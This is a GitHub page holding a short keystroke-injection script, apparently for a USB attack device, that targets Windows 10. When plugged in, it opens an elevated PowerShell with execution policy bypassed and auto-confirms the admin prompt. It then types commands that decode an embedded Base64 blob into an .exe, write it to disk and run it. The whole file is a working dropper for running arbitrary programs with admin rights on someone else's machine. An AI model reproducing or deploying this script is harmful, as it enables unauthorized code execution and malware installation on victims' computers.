-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathDecode-Execute Base64.js
41 lines (35 loc) · 1.12 KB
/
Decode-Execute Base64.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
// =============================================================================
// Title: Base64 Decode & Execute
// Author: @beigeworm | https://github.com/beigeworm
// Description: Uses Powershell to decode a Base64 string and then execute the file.
// Target: Windows 10
// =============================================================================
// *USB SETTING*
// startup
// *SETUP*
// replace YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES and NAME_HERE below.
// =============================================================================
// script setup
layout("us")
// Open Powershell as Admin
press("GUI r");
delay(1000);
type("powershell -NoP -NonI -Exec Bypass");
delay(500);
press("CONTROL SHIFT ENTER");
delay(3000);
press("ALT y");
delay(4000);
// Main Powershell code
type("$b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES';");
press("ENTER");
delay(500);
type("$decodedFile = [System.Convert]::FromBase64String($b64);");
press("ENTER");
delay(500);
type("$File = \"NAME_HERE\"+\".exe\";");
press("ENTER");
delay(500);
type("Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File");
press("ENTER");
delay(500);